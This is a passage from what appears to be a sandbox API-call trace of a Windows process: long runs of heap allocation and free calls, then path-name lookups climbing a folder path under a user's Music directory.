returned 1 [0197.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.717] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.717] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.719] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.719] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.721] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.721] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x2aeaea0 [0197.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.723] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.728] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.728] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.731] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.732] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.734] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.734] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.735] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.735] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.736] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.736] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.737] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.737] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.738] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.738] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.739] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.739] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.741] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.741] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.742] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.742] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.744] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.744] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.745] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.745] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.746] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.746] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.747] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.748] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.748] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.749] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.749] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac3dd0 [0197.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.750] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.750] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.751] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.751] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.752] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2aeaea0 [0197.752] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aeaea0 | out: hHeap=0x2c0000) returned 1 [0197.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac3dd0 [0197.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac3dd0 [0197.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.756] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.756] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac3dd0 [0197.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac3dd0 | out: hHeap=0x2c0000) returned 1 [0197.757] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbd28 [0197.757] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\47m5sv0uqVNl\\") returned="47m5sv0uqVNl\\" [0197.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7a40 [0197.757] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2efb0 [0197.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbd28 | out: hHeap=0x2c0000) returned 1 [0197.758] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\j ucK2lALp_iPp\\") returned="j ucK2lALp_iPp\\" [0197.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2aea890 [0197.758] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2efb0 | out: hHeap=0x2c0000) returned 1 [0197.758] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Music\\") returned="Music\\" [0197.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0197.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aea890 | out: hHeap=0x2c0000) returned 1 [0197.759] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0197.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0197.759] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0197.759] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0197.760] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, 